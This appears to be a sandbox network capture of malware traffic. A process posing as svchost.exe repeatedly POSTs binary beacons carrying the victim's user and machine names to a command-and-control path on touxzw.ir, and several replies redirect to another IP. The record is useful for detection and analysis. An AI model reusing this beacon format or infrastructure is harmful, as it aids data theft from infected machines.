Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:45.773381948 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:45.778879881 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:46.551970005 CET	852	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2Zp7TqXJMa%2BswZxeqZHSlwLFOy1zoZMg9xe4dNUlihe%2B%2Bsl0LIa2GO%2FWWg90kDdGxc7fxJRouqMgL4npI4uyUVf%2BXAJ1sIZrBsEsK57E%2BDRnrI%2Fzm99uwK%2B2ig%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf34acc080dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1493&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:46.704660892 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:46.710798979 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:47.489578962 CET	837	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQAX5N5hTgMbtl1uuWM76MjOUw6MQ4nW8o7RBC9lvAVcFNw7GZQgA4ErTAeoo9N1P1hLPxw%2FWPTTxt9fVYwwWk8t8dqWC5YbSOYXQ9qtTds98GSdTzb5ymToGt4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf3a692cc32d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1447&min_rtt=1447&rtt_var=723&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:47.652653933 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:47.657941103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:48.380449057 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:48 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vju9Gipo9bRUCfhabs66qFAruBqCwlHwBybNBhzefzGo75Y6i0PYMTOT3SbY92gsBgsqFPaxqUqe7bHYaWakHm5SHArffkM7hOW2rmrizO5h28%2BhxhEy5qnzjuM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf404b24c46b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1548&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:48.533803940 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:48.538949013 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:49.167604923 CET	839	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VpMA93zsLlYebb5Ht8pKX4ooWr85BiHEaAWEGV1gMBrJ36KZXxrLJcoGcfzgd8lktBmHqVWvXXe0sDAi3nNnaZjv5ItV0FPHNxE49%2BXFbMBHQ0NHQ2Jp19rVA5U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf45e8c44313-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2336&min_rtt=2336&rtt_var=1168&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:49.326426983 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:49.331682920 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:50.052853107 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:50 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3UVBUrGV52H5X%2FPLXrXc07qIXLeIdQ3DuBBh%2B7jneSItAGPJLeqh0peOKwooEQS9bZ0ki3f6SXQTYBNWYcVvw77EBSyPZB3rfc%2Bgh3pjNAsUYksRpiAsm6EV6E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf4acdca4307-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:50.235701084 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:50.240892887 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:50.996112108 CET	840	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KT%2FQTbqXIB9AF8UB6hylCB0BsVUHWdvLT6mV02yQ3hN1WEJnST52SMnhiW3oAbWsGEWR1f8hj0Izc%2B6VhU8ATR2NBccN6UUX2be0aV4nmVgHRSkwfwdv1sZHMQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf507ff57cf0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1984&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:51.166151047 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:51.171451092 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:52.068084002 CET	831	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:51 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQW56MBk101DkU%2BHXXUU2IAnjSRpgXn%2FZr4YF1zpFRGquI2vRGqGBEiATxw%2FeQxB8jFvdxpvN9hgOpcks5gv5%2FffpIDrbN%2BAdlLq%2FWw%2FH9A9V8qqP2r1jHNcMAA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf565e3c4252-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2582&min_rtt=2582&rtt_var=1291&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:52.221129894 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:52.226264000 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:53.012604952 CET	842	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7bKmEKrwDgfi4VbXr6nsVhPBeeF%2BRkSrdRA6S5R8KpJA8smlKZGj8LAt4Nt7rJwmEDwDjdsaUfNlitSNSwAXG1qLEl0jJABJ2%2Bd0%2BoW1JCTpN2bX77nEFI2R1R4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf5cf8d6f5fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1416&min_rtt=1416&rtt_var=708&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:53.496340990 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:53.501662016 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:54.257286072 CET	846	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DuZsn%2BUTcHPrZ98hZjKYH8xjRCUsmFuoLEH0oBcp4JLssZGFoBI4tYqjsWw9YdJ7%2BdVgrrTWQCDzbyqWwdM6fPt%2Fk2Z4R65URerE7z6DEvAniSy4o6a3XPJjsQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf64ddff42a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20781&min_rtt=20781&rtt_var=10390&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:54.478203058 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:54.486058950 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:55.234193087 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:55 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ud7JPMZZMt39X3HzBBqZeoCUwH3W0GPU6yU22ddJYVKFUSTbxb%2F6Nme%2Byg49CyZwPH%2FyHX49LvayjzhpVzGpQ95DZDzgx0P1GYlPy02i6UL%2BTUSptQDc7ZqkozU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf6b2f0d236b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:55.403469086 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:55.408746004 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:56.181890965 CET	845	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nU%2FpZZdMpsyR2jhFsJbsgSFIooo3ss85fy0FQ78m2GTkLCqOmulss8L%2BCJGrQHZR1PCvE1CtBMYDm8PXiTF69%2FJcryZpNgTJm5otRth3jnbQ%2F4Z%2FDeiABDp6LU4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf70dad94213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:56.508342981 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:56.514457941 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:57.247345924 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:57 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2lfIhmArYiJ7Xsb3ns5JCEHXUCyo0YmNzjocbxx55JKsknJMZZevXqROG43SZH5LAHqWUm6wKroE9myvESUpBKRZ3TnFbWFwYI6MGIcZKhve1QZPdgtOEvJQC0A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf77bd710f69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:57.426148891 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:57.431406975 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:59.173927069 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:59 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUHC56tWplZTwLNQvDfnChdM8zhsvyGgKyBGfMpyMd%2FJ%2FK9BvUdbrB8RlKtLdRpDaXvKregC8OEOjC2OuEQm0cJtVMsj9dEBN9Q4w8FeOSdbMlaZlc7G9TyVZkc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf7d6acf439f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:59.516284943 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:59.521476984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
